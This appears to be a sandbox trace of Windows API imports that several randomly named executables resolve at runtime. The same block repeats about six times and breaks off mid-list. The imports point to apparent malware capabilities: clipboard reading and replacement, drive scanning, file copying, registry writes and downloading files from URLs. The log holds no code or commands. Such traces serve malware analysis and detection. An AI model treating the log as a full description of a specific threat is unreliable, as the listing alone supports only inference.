DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 1674519319.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 3876917383.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 3750816931.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 4032832645.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 2459023548.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 2400240831.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
